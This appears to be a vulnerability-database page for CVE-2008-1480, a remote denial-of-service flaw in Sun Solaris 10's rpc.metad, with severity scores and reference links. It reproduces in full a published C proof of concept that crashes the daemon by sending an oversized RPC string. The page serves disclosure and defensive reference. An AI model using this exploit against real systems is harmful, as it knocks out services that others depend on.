CVE-2008-1480 : Detail

CVE-2008-1480

9.31%V3
Network
2008-03-24
21h00 +00:00
2017-09-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

rpc.metad in Sun Solaris 10 allows remote attackers to cause a denial of service (daemon crash) via a malformed RPC request.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 5258

Publication date : 2008-03-13 23h00 +00:00
Author : kingcope
EDB Verified : Yes

/*##########################################################*/ /*## SunOS 5.10 Sun Cluster rpc.metad DoS PoC #*/ /*## causes DoS on rpc.metad #*/ /*## (C) 2008 - Kingcope #*/ /*##########################################################*/ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <rpc/rpc.h> #include <netdb.h> #include <stdio.h> #include <errno.h> extern int optarg; #define METAD_PROG 100229 #define METAD_VERS 2 #define METAD_FUNC 6 typedef struct{char *string;}req_t; bool_t xdr_req(XDR *xdrs,req_t *obj){ if(!xdr_string(xdrs,&obj->string,~0)) return(FALSE); return(TRUE); } main(int argc,char **argv){ char buffer[30000],address[4],*b,*cmd; int i,c,n,flag=1,vers=0,port=0,sck; CLIENT *cl;enum clnt_stat stat; struct hostent *hp; struct sockaddr_in adr; struct timeval tm={10,0}; req_t req; printf("rpc.metad for solaris 10\n\n"); if(argc<2){ printf("usage: %s address\n",argv[0]); exit(-1); } printf("Using version %d and request no. %d!!\n", METAD_VERS, METAD_FUNC); printf("timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec); fflush(stdout); adr.sin_family=AF_INET; adr.sin_port=htons(port); if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if((hp=gethostbyname(argv[1]))==NULL){ errno=EADDRNOTAVAIL;perror("error");exit(-1); } memcpy(&adr.sin_addr.s_addr,hp->h_addr,4); } sck=RPC_ANYSOCK; if(!(cl=clnttcp_create(&adr,METAD_PROG,METAD_VERS,&sck,0,0))){ clnt_pcreateerror("error");exit(-1); } cl->cl_auth=authunix_create("localhost",0,0,0,NULL); memset(buffer, 'A', sizeof(buffer)); //buffer can also be small,this is not a bufover buffer[3000]=0; req.string=buffer; stat=clnt_call(cl,METAD_FUNC,xdr_req,&req,xdr_void,NULL,tm); if(stat==RPC_SUCCESS) {printf("\nerror: not vulnerable\n"); printf("sent!\n"); /* if(!flag) exit(0);*/ } } // milw0rm.com [2008-03-14]

Products Mentioned

Configuraton 0

Sun>>Solaris >> Version 10

    Sun>>Sunos >> Version 5.10

    References

    http://sunsolve.sun.com/search/document.do?assetkey=1-26-249146-1
    Tags : vendor-advisory, x_refsource_SUNALERT
    http://secunia.com/advisories/29418
    Tags : third-party-advisory, x_refsource_SECUNIA
    https://www.exploit-db.com/exploits/5258
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.vupen.com/english/advisories/2009/0206
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.securityfocus.com/bid/28261
    Tags : vdb-entry, x_refsource_BID
    http://www.securitytracker.com/id?1019652
    Tags : vdb-entry, x_refsource_SECTRACK